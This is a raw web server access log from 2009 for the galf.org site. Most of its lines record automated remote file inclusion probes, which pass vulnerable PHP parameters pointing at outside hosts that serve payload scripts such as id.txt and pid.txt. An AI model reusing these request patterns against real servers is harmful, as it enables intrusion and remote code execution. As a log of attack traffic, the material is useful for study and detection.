195.70.35.48 - - [29/Nov/2009:17:50:44 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:50:46 -0800] "GET /logs/access_090720.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.137 - - [29/Nov/2009:17:51:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:52:39 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:52:39 -0800] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.137 - - [29/Nov/2009:17:53:07 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:53:42 -0800] "GET /logs/access_090713.log/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:53:42 -0800] "GET /e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:53:42 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:53:52 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:53:52 -0800] "GET /logs/access_090817.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:53:52 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:03 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:03 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:03 -0800] "GET /logs/access_090817.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:28 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:28 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:28 -0800] "GET /logs/access_090817.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:54:33 -0800] "GET /logs/access_090706.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:54:51 -0800] "GET /logs/access_090622.log/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:07 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:07 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:07 -0800] "GET /logs/access.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:12 -0800] "GET /logs/access_090706.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.24.49.35 - - [29/Nov/2009:17:55:18 -0800] "GET /logs//bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.24.49.35 - - [29/Nov/2009:17:55:18 -0800] "GET /logs/access_090608.log//bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.24.49.35 - - [29/Nov/2009:17:55:18 -0800] "GET /bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:19 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:19 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:19 -0800] "GET /logs/access_090817.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:55:21 -0800] "GET /logs/access_090713.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:55:44 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [29/Nov/2009:17:55:44 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [29/Nov/2009:17:55:44 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [29/Nov/2009:17:56:04 -0800] "GET /logs/access_090706.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:57:41 -0800] "GET /logs/access_090622.log/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.24.49.35 - - [29/Nov/2009:17:59:34 -0800] "GET /logs//bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.24.49.35 - - [29/Nov/2009:17:59:34 -0800] "GET /logs/access_090608.log//bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.24.49.35 - - [29/Nov/2009:17:59:35 -0800] "GET /bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:01:10 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:01:10 -0800] "GET /logs/access_090907.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:01:10 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:01:16 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:01:16 -0800] "GET /logs/access_090907.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:01:16 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.78 - - [29/Nov/2009:18:01:28 -0800] "GET /logs/access.log HTTP/1.1" 200 58729 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:02:24 -0800] "GET /logs/access_090525.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:02:24 -0800] "GET /logs/access_090525.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:02:55 -0800] "GET /logs/access_090525.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:18:03:03 -0800] "GET /logs/access_090525.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [29/Nov/2009:18:03:24 -0800] "GET /logs/access_090622.log/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [29/Nov/2009:18:03:24 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [29/Nov/2009:18:03:24 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [29/Nov/2009:18:04:50 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [29/Nov/2009:18:04:50 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [29/Nov/2009:18:04:50 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:09:11 -0800] "GET //?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:09:11 -0800] "GET /logs///?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:09:30 -0800] "GET /logs/access_091012.log///?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:09:30 -0800] "GET /logs///?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:09:44 -0800] "GET /logs///?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.0" 200 4932 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:09:44 -0800] "GET //?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:10:45 -0800] "GET //?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:10:46 -0800] "GET /logs/access_091026.log///?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:10:46 -0800] "GET /logs///?_PHPLIB[libdir]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [29/Nov/2009:18:11:05 -0800] "GET /?sourcedir=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
64.22.119.110 - - [29/Nov/2009:18:11:05 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
67.195.115.152 - - [29/Nov/2009:18:14:32 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.115.152 - - [29/Nov/2009:18:19:00 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:18:20:45 -0800] "GET /logs/access_090914.log//include.php?language= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:18:20:45 -0800] "GET /include.php?language= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:18:20:45 -0800] "GET /logs//include.php?language= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:22:12 -0800] "GET //?_PHPLIB[libdir]=http://www.italianmec.com/banner/file.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:23:24 -0800] "GET /logs/access_090615.log/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:23:24 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:23:24 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:24:14 -0800] "GET /logs/access_090921.log/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:24:37 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:24:37 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:24:37 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:27:37 -0800] "GET /logs/access_091026.log///?_PHPLIB[libdir]=http://www.italianmec.com/banner/file.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:27:37 -0800] "GET //?_PHPLIB[libdir]=http://www.italianmec.com/banner/file.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:18:27:37 -0800] "GET /logs///?_PHPLIB[libdir]=http://www.italianmec.com/banner/file.txt???? HTTP/1.1" 200 4948 "-" "libwww-perl/5.79" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:29:45 -0800] "GET /logs/access_090622.log/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:29:45 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:29:45 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:29:57 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:29:57 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:29:57 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:30:25 -0800] "GET /logs/access_090914.log%20%20/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:18:32:40 -0800] "GET /logs/access_090914.log%20//include.php?language= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:36:01 -0800] "GET /logs/access_090622.log/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:36:01 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:36:01 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:36:18 -0800] "GET /logs/access.log/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:36:18 -0800] "GET /?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:18:36:18 -0800] "GET /logs/?sourcedir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:18:36:38 -0800] "GET /logs/access_090817.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:18:36:38 -0800] "GET /skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:18:36:38 -0800] "GET /logs//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:18:36:57 -0800] "GET /logs/access_090907.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:37:25 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:37:25 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:37:25 -0800] "GET /logs/access_090713.log%20%20//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:37:26 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:37:26 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:37:26 -0800] "GET /logs/access_090713.log%20%20//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:38:04 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:38:04 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:38:04 -0800] "GET /logs/access_090713.log//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:38:53 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:38:53 -0800] "GET /logs/access_090713.log//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:38:53 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.238.192 - - [29/Nov/2009:18:39:13 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1782131 "http://www.galf.org/logs/scripts.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
72.52.189.20 - - [29/Nov/2009:18:40:16 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:40:16 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:40:21 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:40:21 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:40:21 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:40:21 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:41:35 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:41:35 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:41:35 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [29/Nov/2009:18:42:16 -0800] "GET /logs/access_090817.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:18:42:16 -0800] "GET /skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:18:42:16 -0800] "GET /logs//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:18:42:17 -0800] "GET /logs/access_090907.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
